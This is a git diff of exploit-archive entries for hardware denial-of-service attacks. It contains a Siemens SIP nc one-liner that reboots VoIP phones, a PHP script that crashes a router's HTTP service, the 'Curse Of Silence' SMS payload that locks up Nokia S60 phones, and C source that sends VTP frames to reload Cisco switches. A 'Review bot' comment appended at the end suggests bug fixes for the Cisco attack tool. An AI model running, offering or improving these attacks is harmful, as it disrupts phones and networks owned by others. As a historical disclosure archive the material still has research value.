-application silent crash. Arbitrary code execution is probably not possible. -The problem arises in the JavaScript core of the S60WebKit, invoking the sort() -function on a recursive array. 
-A similar behavior was observed some years ago in several browsers due to -the common code base (BID-12331, BID-11762, BID-11760, BID-11759, -BID-11752). - -==================================================== -5) Exploit - -Embed in an HTML page the following JavaScript: - - -==================================================== -6) Fix Information - -n/a - -==================================================== -7) Time Table - -08/09/2008 - Vendor notified. -15/09/2008 - Vendor response. -??/??/???? - Vendor patch release. -10/10/2008 - Public disclosure. - -==================================================== -8) Credits - -Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com - -==================================================== -9) Legal Notices - -The information in the advisory is believed to be accurate at the time of -publishing based on currently available information. -This information is provided as-is, as a free service to the community. -There are no warranties with regard to this information. -The author does not accept any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. -Permission is hereby granted for the redistribution of this alert, provided -that the content is not altered in any way, except reformatting, and that due -credit is given. 
- -This vulnerability has been disclosed in accordance with the RFP -Full-Disclosure Policy v2.0, available at: -http://www.wiretrip.net/rfp/policy.html - -==================================================== - -# milw0rm.com [2008-10-10] +==================================================== +Security Research Advisory + +Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability +Advisory number: LC-2008-04 +Advisory URL: http://www.ikkisoft.com + +==================================================== +1) Affected Software + +* Nokia Mini Map Browser (S60WebKit <= 21772) + +The tested device has the following User-Agent: +Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75 +Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML) +Safari/413 + +Note: Although the Nokia Web Browser is built upon a port of the +open source WebKit used by Apple for its browser, the iPhone is not +affected (at least the iPhone firmware version 2.0.2(5C1)) + +==================================================== +2) Severity + +Severity: Low +Local/Remote: Remote + +==================================================== +3) Summary + +The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web +browser for the S60 mobile phone platform developed by Nokia. +It is built upon S60WebKit, a port of the open source WebKit project to the S60 +platform. According to several sources, the S60 software on Symbian OS is the +world’s most popular software for smartphones. + +This version of the Nokia Mini Map Browser does not properly validate JavaScript +input embedded in visited HTML pages. An aggressor can easily trigger Denial of +Service attacks. + +References: +http://opensource.nokia.com/projects/S60browser/ +http://en.wikipedia.org/wiki/Web_Browser_for_S60 + +==================================================== +4) Vulnerability Details + +The Nokia Mini Map Browser is prone to a vulnerability that may result in the +application silent crash. 
Arbitrary code execution is probably not possible. +The problem arises in the JavaScript core of the S60WebKit, invoking the sort() +function on a recursive array. +A similar behavior was observed some years ago in several browsers due to +the common code base (BID-12331, BID-11762, BID-11760, BID-11759, +BID-11752). + +==================================================== +5) Exploit + +Embed in an HTML page the following JavaScript: + + +==================================================== +6) Fix Information + +n/a + +==================================================== +7) Time Table + +08/09/2008 - Vendor notified. +15/09/2008 - Vendor response. +??/??/???? - Vendor patch release. +10/10/2008 - Public disclosure. + +==================================================== +8) Credits + +Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com + +==================================================== +9) Legal Notices + +The information in the advisory is believed to be accurate at the time of +publishing based on currently available information. +This information is provided as-is, as a free service to the community. +There are no warranties with regard to this information. +The author does not accept any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. +Permission is hereby granted for the redistribution of this alert, provided +that the content is not altered in any way, except reformatting, and that due +credit is given. + +This vulnerability has been disclosed in accordance with the RFP +Full-Disclosure Policy v2.0, available at: +http://www.wiretrip.net/rfp/policy.html + +==================================================== + +# milw0rm.com [2008-10-10] diff --git a/platforms/hardware/dos/7220.txt b/platforms/hardware/dos/7220.txt index 692861913..908ee8adb 100755 --- a/platforms/hardware/dos/7220.txt +++ b/platforms/hardware/dos/7220.txt 
@@ -1,16 +1,16 @@
-Hi,
-
-echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060
-
-Will disconnect all current VOIP and PSTN calls and reboot
-the C450IP/C475IP devices.
-
-Tested with current firmwares.
-
-Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
-
-Have phun!
-
-sky & Any
-
-# milw0rm.com [2008-11-24]
+Hi,
+
+echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060
+
+Will disconnect all current VOIP and PSTN calls and reboot
+the C450IP/C475IP devices.
+
+Tested with current firmwares.
+
+Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
+
+Have phun!
+
+sky & Any
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/hardware/dos/7535.php b/platforms/hardware/dos/7535.php
index 204e5ae83..a4eacc888 100755
--- a/platforms/hardware/dos/7535.php
+++ b/platforms/hardware/dos/7535.php
@@ -1,64 +1,64 @@
- nmap 192.168.1.1
-*
-* Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST
-* Interesting ports on 192.168.1.1:
-* Not shown: 1695 closed ports
-* PORT STATE SERVICE
-* 23/tcp open telnet
-* 443/tcp open https
-*
-* Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds
-*
-* Looks like HTTP died...
-* HTTPS is running however you cannot login. The service is basically useless.
-* Telnet is also open for administration (if configured to be).
-*
-* Apart from not being able to use the Web Administration Interface the device
-* seems to function fine.
-*/
-
-set_time_limit(0);
-
-$host = "192.168.1.1"; //Default IP is 192.168.1.1
-if (isset($argv[1]))
- $host = $argv[1];
-$port = 80;
-
-echo "Connecting...\n";
-$conn = fsockopen($host, $port, $errno, $errstr);
-if ($conn)
-{
- $payload = "GET /".str_repeat('A', 10240)." HTTP/1.1";
-
- if (fwrite($conn, $payload))
- echo "Payload sent!\n";
-
- fclose($conn);
-}
-?>
-
-# milw0rm.com [2008-12-21]
+ nmap 192.168.1.1
+*
+* Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST
+* Interesting ports on 192.168.1.1:
+* Not shown: 1695 closed ports
+* PORT STATE SERVICE
+* 23/tcp open telnet
+* 443/tcp open https
+*
+* Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds
+*
+* Looks like HTTP died...
+* HTTPS is running however you cannot login. The service is basically useless.
+* Telnet is also open for administration (if configured to be).
+*
+* Apart from not being able to use the Web Administration Interface the device
+* seems to function fine.
+*/
+
+set_time_limit(0);
+
+$host = "192.168.1.1"; //Default IP is 192.168.1.1
+if (isset($argv[1]))
+ $host = $argv[1];
+$port = 80;
+
+echo "Connecting...\n";
+$conn = fsockopen($host, $port, $errno, $errstr);
+if ($conn)
+{
+ $payload = "GET /".str_repeat('A', 10240)." HTTP/1.1";
+
+ if (fwrite($conn, $payload))
+ echo "Payload sent!\n";
+
+ fclose($conn);
+}
+?>
+
+# milw0rm.com [2008-12-21]
diff --git a/platforms/hardware/dos/7632.txt b/platforms/hardware/dos/7632.txt
index 541d53a85..c9b7eff0f 100755
--- a/platforms/hardware/dos/7632.txt
+++ b/platforms/hardware/dos/7632.txt
@@ -1,228 +1,228 @@ -Vulnerability Advisory -====================== - -Remote SMS/MMS Denial of Service - "Curse Of Silence" -for Nokia S60 phones - - -URL -=== - -https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt - - -Video -===== - -https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi - - -Affected Products -================= - -All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at -the end of the document. - - -Requirements to Execute Attack -============================== - -- MSISDN of the target -- mobile phone contract that allows sending of SMS messages -- (almost) any Nokia phone (or some other means of sending SMS - messages with TP-PID set to "Internet Electronic Mail") - - -Risk Level -========== - -Medium (for S60 2.8 and 3.1 devices): Target will not be able to -receive any SMS or MMS messages while the attack is ongoing. After -that, only very limited message receiving is possible until the device -is Factory Resetted - -High (for S60 2.6 and 3.0 devices): Target will not be able to receive -any SMS or MMS messages until the device is Factory Resetted - - -Summary -======= - -Emails can be sent via SMS by setting the messages Protocol Identifier -to "Internet Electronic Mail" and formatting the message like this: - - - -If such messages contain an with more than 32 -characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive -other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after -only one message, 2.8 and 3.1 devices after 11 messages. - - -Details -======= - -3GPP TS 23.040 specifies a method for sending emails via SMS in -section 3.8 ("SMS and Internet Electronic Mail interworking"). In its -most basic form, such a SMS message starts with the from- (MT-SMS) or -to-email-address (MO-SMS), followed by a space character, and then the -message body. The TP-Procotol-Identifier of the SMS message has to be -set to "Internet Electronic Mail" (value: 50 / 0x32). 
- -It is not specified how such a message should be displayed when -received by the phone. Before S60 2.6, Series60 devices displayed such -messages exactly as they were sent. Starting with S60 2.6, when the -part of the message that should contain the from-address looks -anything like an email address (i.e. it contains an "@" somewhere), -this address is then displayed as the message sender instead of the -usually shown TP-Originating-Address. - -If this email address is longer than 32 characters, Series60 2.6, 2.8, -3.0 and 3.1 devices fail to display the message or give any indication -on the user interface that such a message has been received. They do, -however, signal to the SMSC that they received the message by sending -an RP-ACK. - -Devices running S60 2.6 or 3.0 will not be able to receive any other -SMS message after that. The user interface does not give any -indication of this situation. The only action to remedy this situation -seems to be a Factory Reset of the device (by entering "*#7370#"). - -Devices running S60 2.8 or 3.1 react a little different: They do not -lock up until they received at least 11 SMS-email messages with an -email address that is longer than 32 characters. The device will not -be able to receive any other SMS message after that - upon receiving -the next message, the phone will just display a warning that there is -not enough memory to receive further messages and that data should be -deleted first. This message is even displayed on an otherwise -completely "empty" device. - -After switching the phone off and on again, it has limited capability -for receiving SMS messages again: If it receives a SMS message that is -split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated -Short Messages) it is only able to receive the first part and will -display the "not enough memory" warning again. After powercycling the -device again, it can then receive the second part. 
If there is a third -part, it has to be powercycled again, and so on. - -Also, an attacker now just needs to send one more "Curse Of Silence" -message to lock the phone up again. By always sending yet another one -as soon as the status report for delivery of the previous message is -received, the attacker could completely prevent a target from -receiving any other SMS/MMS messages. - -Only Factory Resetting the device will restore its full message -receiving capabilities. Note that, if a backup is made using Nokia -PC-Suite *after* being attacked, the blocking messages are also -backuped and will be sent to the device again when restoring the -backup after the Factory Reset. - -Note that not being able to receive SMS messages also means not being -able to receive MMS messages, since they are signalled by sending an -SMS message to the device. - -"Curse Of Silence" messages can be generated with any phone or -cellular modem that supports 3GPP TS 27.005 AT commands and with most -Nokia phones also directly from the user interface. For example, on -S60 devices, when in the message editor, the type of the message can -be switched to "E-mail" under "Options" -> "Sending options" -> -"Message sent as". The 6310i conveniently offers a "Write email" menu -entry in the messaging menu. - -The simplest form of content for a Curse Of Silence would be something -like "123456789@123456789.1234567890123 " (the digits are used only to -illustrate the length of the "email address" of more than 32 -characters). Note the space at the end of the message! - - -Workaround -========== - -None known for the user side. - -Until a firmware fix is available, network operators should filter -messages with TP-PID "Internet Electronic Mail" and an email address -of more than 32 characters or reset the TP-PID of these messages to 0. - - -Credits -======= - -Tobias Engel -November 9, 2008 - -Many thanks to Frank Rieger for spending countless hours cutting and -editing the video. 
- - -Detailed List of Affected Products -================================== - -Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable -component is a S60 base functionality, it seems safe to assume that -all devices with these OS versions are affected. - -S60 3rd Edition, Feature Pack 1 (S60 3.1): -Nokia E90 Communicator -Nokia E71 -Nokia E66 -Nokia E51 -Nokia N95 8GB -Nokia N95 -Nokia N82 -Nokia N81 8GB -Nokia N81 -Nokia N76 -Nokia 6290 -Nokia 6124 classic -Nokia 6121 classic -Nokia 6120 classic -Nokia 6110 Navigator -Nokia 5700 XpressMusic - -S60 3rd Edition, initial release (S60 3.0): -Nokia E70 -Nokia E65 -Nokia E62 -Nokia E61i -Nokia E61 -Nokia E60 -Nokia E50 -Nokia N93i -Nokia N93 -Nokia N92 -Nokia N91 8GB -Nokia N91 -Nokia N80 -Nokia N77 -Nokia N73 -Nokia N71 -Nokia 5500 -Nokia 3250 - -S60 2nd Edition, Feature Pack 3 (S60 2.8): -Nokia N90 -Nokia N72 -Nokia N70 - -S60 2nd Edition, Feature Pack 2 (S60 2.6): -Nokia 6682 -Nokia 6681 -Nokia 6680 -Nokia 6630 - - -Change History -============== - -December 30, 2008: -Removed auth details since they are no longer required - -December 21, 2008: -Corrected version numbers for S60 2nd Edition - -December 13, 2008: -S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0 -devices - -# milw0rm.com [2009-01-01] +Vulnerability Advisory +====================== + +Remote SMS/MMS Denial of Service - "Curse Of Silence" +for Nokia S60 phones + + +URL +=== + +https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt + + +Video +===== + +https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi + + +Affected Products +================= + +All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at +the end of the document. 
+ + +Requirements to Execute Attack +============================== + +- MSISDN of the target +- mobile phone contract that allows sending of SMS messages +- (almost) any Nokia phone (or some other means of sending SMS + messages with TP-PID set to "Internet Electronic Mail") + + +Risk Level +========== + +Medium (for S60 2.8 and 3.1 devices): Target will not be able to +receive any SMS or MMS messages while the attack is ongoing. After +that, only very limited message receiving is possible until the device +is Factory Resetted + +High (for S60 2.6 and 3.0 devices): Target will not be able to receive +any SMS or MMS messages until the device is Factory Resetted + + +Summary +======= + +Emails can be sent via SMS by setting the messages Protocol Identifier +to "Internet Electronic Mail" and formatting the message like this: + + + +If such messages contain an with more than 32 +characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive +other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after +only one message, 2.8 and 3.1 devices after 11 messages. + + +Details +======= + +3GPP TS 23.040 specifies a method for sending emails via SMS in +section 3.8 ("SMS and Internet Electronic Mail interworking"). In its +most basic form, such a SMS message starts with the from- (MT-SMS) or +to-email-address (MO-SMS), followed by a space character, and then the +message body. The TP-Procotol-Identifier of the SMS message has to be +set to "Internet Electronic Mail" (value: 50 / 0x32). + +It is not specified how such a message should be displayed when +received by the phone. Before S60 2.6, Series60 devices displayed such +messages exactly as they were sent. Starting with S60 2.6, when the +part of the message that should contain the from-address looks +anything like an email address (i.e. it contains an "@" somewhere), +this address is then displayed as the message sender instead of the +usually shown TP-Originating-Address. 
+ +If this email address is longer than 32 characters, Series60 2.6, 2.8, +3.0 and 3.1 devices fail to display the message or give any indication +on the user interface that such a message has been received. They do, +however, signal to the SMSC that they received the message by sending +an RP-ACK. + +Devices running S60 2.6 or 3.0 will not be able to receive any other +SMS message after that. The user interface does not give any +indication of this situation. The only action to remedy this situation +seems to be a Factory Reset of the device (by entering "*#7370#"). + +Devices running S60 2.8 or 3.1 react a little different: They do not +lock up until they received at least 11 SMS-email messages with an +email address that is longer than 32 characters. The device will not +be able to receive any other SMS message after that - upon receiving +the next message, the phone will just display a warning that there is +not enough memory to receive further messages and that data should be +deleted first. This message is even displayed on an otherwise +completely "empty" device. + +After switching the phone off and on again, it has limited capability +for receiving SMS messages again: If it receives a SMS message that is +split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated +Short Messages) it is only able to receive the first part and will +display the "not enough memory" warning again. After powercycling the +device again, it can then receive the second part. If there is a third +part, it has to be powercycled again, and so on. + +Also, an attacker now just needs to send one more "Curse Of Silence" +message to lock the phone up again. By always sending yet another one +as soon as the status report for delivery of the previous message is +received, the attacker could completely prevent a target from +receiving any other SMS/MMS messages. + +Only Factory Resetting the device will restore its full message +receiving capabilities. 
Note that, if a backup is made using Nokia +PC-Suite *after* being attacked, the blocking messages are also +backuped and will be sent to the device again when restoring the +backup after the Factory Reset. + +Note that not being able to receive SMS messages also means not being +able to receive MMS messages, since they are signalled by sending an +SMS message to the device. + +"Curse Of Silence" messages can be generated with any phone or +cellular modem that supports 3GPP TS 27.005 AT commands and with most +Nokia phones also directly from the user interface. For example, on +S60 devices, when in the message editor, the type of the message can +be switched to "E-mail" under "Options" -> "Sending options" -> +"Message sent as". The 6310i conveniently offers a "Write email" menu +entry in the messaging menu. + +The simplest form of content for a Curse Of Silence would be something +like "123456789@123456789.1234567890123 " (the digits are used only to +illustrate the length of the "email address" of more than 32 +characters). Note the space at the end of the message! + + +Workaround +========== + +None known for the user side. + +Until a firmware fix is available, network operators should filter +messages with TP-PID "Internet Electronic Mail" and an email address +of more than 32 characters or reset the TP-PID of these messages to 0. + + +Credits +======= + +Tobias Engel +November 9, 2008 + +Many thanks to Frank Rieger for spending countless hours cutting and +editing the video. + + +Detailed List of Affected Products +================================== + +Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable +component is a S60 base functionality, it seems safe to assume that +all devices with these OS versions are affected. 
+
+S60 3rd Edition, Feature Pack 1 (S60 3.1):
+Nokia E90 Communicator
+Nokia E71
+Nokia E66
+Nokia E51
+Nokia N95 8GB
+Nokia N95
+Nokia N82
+Nokia N81 8GB
+Nokia N81
+Nokia N76
+Nokia 6290
+Nokia 6124 classic
+Nokia 6121 classic
+Nokia 6120 classic
+Nokia 6110 Navigator
+Nokia 5700 XpressMusic
+
+S60 3rd Edition, initial release (S60 3.0):
+Nokia E70
+Nokia E65
+Nokia E62
+Nokia E61i
+Nokia E61
+Nokia E60
+Nokia E50
+Nokia N93i
+Nokia N93
+Nokia N92
+Nokia N91 8GB
+Nokia N91
+Nokia N80
+Nokia N77
+Nokia N73
+Nokia N71
+Nokia 5500
+Nokia 3250
+
+S60 2nd Edition, Feature Pack 3 (S60 2.8):
+Nokia N90
+Nokia N72
+Nokia N70
+
+S60 2nd Edition, Feature Pack 2 (S60 2.6):
+Nokia 6682
+Nokia 6681
+Nokia 6680
+Nokia 6630
+
+
+Change History
+==============
+
+December 30, 2008:
+Removed auth details since they are no longer required
+
+December 21, 2008:
+Corrected version numbers for S60 2nd Edition
+
+December 13, 2008:
+S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0
+devices
+
+# milw0rm.com [2009-01-01]
diff --git a/platforms/hardware/dos/7776.c b/platforms/hardware/dos/7776.c
index 295e9e47b..c575e86ad 100755
--- a/platforms/hardware/dos/7776.c
+++ b/platforms/hardware/dos/7776.c
@@ -1,188 +1,188 @@ -/*DoS code for Cisco VLAN Trunking Protocol Vulnerability - * - *vulerability discription: - *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml - * - *To Known: - * 1.the switch must in Server/Client Mode. - * 2.the port ,attacker connected,must be in trunk Mode. - * Cisco Ethernet ports with no configuration are not - * in trunk.but trunk mode can be obtained through DTP - * attack by Yersinia. - * 3.you must known the vtp domain,this can be sniffed - * 4.some codes are from Yersinia. - * - *Result: - * switch reload. - * - * - *Compile: - * gcc -o vtp `libnet-config --libs` vtp.c - * - *Usage:vtp -i -d - * - *Contact: showrun.lee[AT]gmail.com - *http://sh0wrun.blogspot.com/ - */ -#include -#include -#include - -#define VTP_DOMAIN_SIZE 32 -#define VTP_TIMESTAMP_SIZE 12 - -struct vtp_summary { - u_int8_t version; - u_int8_t code; - u_int8_t followers; - u_int8_t dom_len; - u_int8_t domain[VTP_DOMAIN_SIZE]; - u_int32_t revision; - u_int32_t updater; - u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; - u_int8_t md5[16]; -}; - -struct vtp_subset { - u_int8_t version; - u_int8_t code; - u_int8_t seq; - u_int8_t dom_len; - u_int8_t domain[VTP_DOMAIN_SIZE]; - u_int32_t revision; -}; - -void usage( char *s) { - printf("%s -i -d \n",s); - exit (1); -} - -int main( int argc, char *argv[] ) -{ - int opt,k=0; - extern char *optarg; - libnet_ptag_t t; - libnet_t *lhandler; - u_int32_t vtp_len=0, sent; - struct vtp_summary *vtp_summ; - struct vtp_subset *vtp_sub; - u_int8_t *vtp_packet,*vtp_packet2, *aux; - u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; - u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; - u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; - struct libnet_ether_addr *mymac; - char *device; - char error_information[LIBNET_ERRBUF_SIZE]; - char *domain; - -// get options - while ((opt = getopt(argc, argv, "i:d:")) != -1) - { - switch (opt) { - case 'i': - device=malloc(strlen(optarg)); - strcpy(device,optarg); - 
k=1; - break; - - case 'd': - domain=malloc(strlen(optarg)); - strcpy(domain,optarg); - break; - - default: usage(argv[0]); - } - } - if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);} - -//init libnet - - lhandler=libnet_init(LIBNET_LINK,device,error_information); - if (!lhandler) { - fprintf(stderr, "libnet_init: %s\n", error_information); - return -1; - } - - mymac=libnet_get_hwaddr(lhandler); -//build the first packet for vtp_summary - vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); - vtp_packet = calloc(1,vtp_len); - aux = vtp_packet; - memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); - aux+=sizeof(cisco_data); - vtp_summ = (struct vtp_summary *)aux; - vtp_summ->version = 0x01; - vtp_summ->code = 0x01;//vtp_summary - vtp_summ->followers = 0x01; - vtp_summ->dom_len = strlen(domain); - memcpy(vtp_summ->domain,domain,strlen(domain)); - vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok - t = libnet_build_802_2( - 0xaa, /* DSAP */ - 0xaa, /* SSAP */ - 0x03, /* control */ - vtp_packet, /* payload */ - vtp_len, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - t = libnet_build_802_3( - dst_mac, /* ethernet destination */ - mymac->ether_addr_octet, /* ethernet source */ - LIBNET_802_2_H + vtp_len, /* frame size */ - NULL, /* payload */ - 0, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - - sent = libnet_write(lhandler); - - if (sent == -1) { - libnet_clear_packet(lhandler); - free(vtp_packet); - return -1; - } - libnet_clear_packet(lhandler); - -//build the second vtp packet for vtp_subset - vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); - vtp_packet2 = calloc(1,vtp_len); - aux = vtp_packet2; - memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); - aux+=sizeof(cisco_data); - - vtp_sub = (struct vtp_subset *)aux; - vtp_sub->version = 0x01; - vtp_sub->code = 0x02; //vtp_subset - vtp_sub->seq = 0x01; - vtp_sub->dom_len = strlen(domain); - 
memcpy(vtp_sub->domain,domain,strlen(domain)); - vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok -// memcpy(vtp_sub->aaa,aaa,strlen(aaa)); - - t = libnet_build_802_2( - 0xaa, /* DSAP */ - 0xaa, /* SSAP */ - 0x03, /* control */ - vtp_packet2, /* payload */ - vtp_len, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - t = libnet_build_802_3( - dst_mac, /* ethernet destination */ - mymac->ether_addr_octet, /* ethernet source */ - LIBNET_802_2_H + vtp_len, /* frame size */ - NULL, /* payload */ - 0, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - - sent = libnet_write(lhandler); - if (sent == -1) { - libnet_clear_packet(lhandler); - free(vtp_packet); - return -1; - } - libnet_clear_packet(lhandler); -} - -// milw0rm.com [2009-01-14] +/*DoS code for Cisco VLAN Trunking Protocol Vulnerability + * + *vulerability discription: + *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml + * + *To Known: + * 1.the switch must in Server/Client Mode. + * 2.the port ,attacker connected,must be in trunk Mode. + * Cisco Ethernet ports with no configuration are not + * in trunk.but trunk mode can be obtained through DTP + * attack by Yersinia. + * 3.you must known the vtp domain,this can be sniffed + * 4.some codes are from Yersinia. + * + *Result: + * switch reload. 
+ * + * + *Compile: + * gcc -o vtp `libnet-config --libs` vtp.c + * + *Usage:vtp -i -d + * + *Contact: showrun.lee[AT]gmail.com + *http://sh0wrun.blogspot.com/ + */ +#include +#include +#include + +#define VTP_DOMAIN_SIZE 32 +#define VTP_TIMESTAMP_SIZE 12 + +struct vtp_summary { + u_int8_t version; + u_int8_t code; + u_int8_t followers; + u_int8_t dom_len; + u_int8_t domain[VTP_DOMAIN_SIZE]; + u_int32_t revision; + u_int32_t updater; + u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; + u_int8_t md5[16]; +}; + +struct vtp_subset { + u_int8_t version; + u_int8_t code; + u_int8_t seq; + u_int8_t dom_len; + u_int8_t domain[VTP_DOMAIN_SIZE]; + u_int32_t revision; +}; + +void usage( char *s) { + printf("%s -i -d \n",s); + exit (1); +} + +int main( int argc, char *argv[] ) +{ + int opt,k=0; + extern char *optarg; + libnet_ptag_t t; + libnet_t *lhandler; + u_int32_t vtp_len=0, sent; + struct vtp_summary *vtp_summ; + struct vtp_subset *vtp_sub; + u_int8_t *vtp_packet,*vtp_packet2, *aux; + u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; + u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; + u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; + struct libnet_ether_addr *mymac; + char *device; + char error_information[LIBNET_ERRBUF_SIZE]; + char *domain; + +// get options + while ((opt = getopt(argc, argv, "i:d:")) != -1) + { + switch (opt) { + case 'i': + device=malloc(strlen(optarg)); + strcpy(device,optarg); + k=1; + break; + + case 'd': + domain=malloc(strlen(optarg)); + strcpy(domain,optarg); + break; + + default: usage(argv[0]); + } + } + if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);} + +//init libnet + + lhandler=libnet_init(LIBNET_LINK,device,error_information); + if (!lhandler) { + fprintf(stderr, "libnet_init: %s\n", error_information); + return -1; + } + + mymac=libnet_get_hwaddr(lhandler); +//build the first packet for vtp_summary + vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); + vtp_packet = calloc(1,vtp_len); 
+ aux = vtp_packet; + memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); + aux+=sizeof(cisco_data); + vtp_summ = (struct vtp_summary *)aux; + vtp_summ->version = 0x01; + vtp_summ->code = 0x01;//vtp_summary + vtp_summ->followers = 0x01; + vtp_summ->dom_len = strlen(domain); + memcpy(vtp_summ->domain,domain,strlen(domain)); + vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok + t = libnet_build_802_2( + 0xaa, /* DSAP */ + 0xaa, /* SSAP */ + 0x03, /* control */ + vtp_packet, /* payload */ + vtp_len, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + t = libnet_build_802_3( + dst_mac, /* ethernet destination */ + mymac->ether_addr_octet, /* ethernet source */ + LIBNET_802_2_H + vtp_len, /* frame size */ + NULL, /* payload */ + 0, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + + sent = libnet_write(lhandler); + + if (sent == -1) { + libnet_clear_packet(lhandler); + free(vtp_packet); + return -1; + } + libnet_clear_packet(lhandler); + +//build the second vtp packet for vtp_subset + vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); + vtp_packet2 = calloc(1,vtp_len); + aux = vtp_packet2; + memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); + aux+=sizeof(cisco_data); + + vtp_sub = (struct vtp_subset *)aux; + vtp_sub->version = 0x01; + vtp_sub->code = 0x02; //vtp_subset + vtp_sub->seq = 0x01; + vtp_sub->dom_len = strlen(domain); + memcpy(vtp_sub->domain,domain,strlen(domain)); + vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok +// memcpy(vtp_sub->aaa,aaa,strlen(aaa)); + + t = libnet_build_802_2( + 0xaa, /* DSAP */ + 0xaa, /* SSAP */ + 0x03, /* control */ + vtp_packet2, /* payload */ + vtp_len, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + t = libnet_build_802_3( + dst_mac, /* ethernet destination */ + mymac->ether_addr_octet, /* ethernet source */ + LIBNET_802_2_H + vtp_len, /* frame size */ + NULL, /* payload */ + 0, /* 
payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + + sent = libnet_write(lhandler); + if (sent == -1) { + libnet_clear_packet(lhandler); + free(vtp_packet); + return -1; + } + libnet_clear_packet(lhandler); +} + +// milw0rm.com [2009-01-14] diff --git a/platforms/hardware/dos/8008.txt b/platforms/hardware/dos/8008.txt index 4e6234c00..68068de17 100755 --- a/platforms/hardware/dos/8008.txt +++ b/platforms/hardware/dos/8008.txt 
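Review bot: In the option parsing in `main`, `device=malloc(strlen(optarg))` and `domain=malloc(strlen(optarg))` allocate one byte too few for the `strcpy` that follows, so the terminating NUL lands past the end of each buffer; `malloc(strlen(optarg)+1)` (or `strdup(optarg)`) fixes both. `domain` is also never initialised, so running without `-d` reaches `strlen(domain)` on an indeterminate pointer, while the `if(!k)` guard only checks that `-i` was given. The two `memcpy(...->domain, domain, strlen(domain))` calls copy into `domain[VTP_DOMAIN_SIZE]` without checking the length, so an argument longer than 32 bytes overruns the struct (and, for `vtp_subset`, the `calloc`'d buffer); a `if (strlen(domain) > VTP_DOMAIN_SIZE) { usage(argv[0]); }` check after option parsing would cover both. Finally, `sent` is declared `u_int32_t` but compared with `-1`, and `vtp_packet2` is never freed on any path (the second error branch frees `vtp_packet` again instead).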
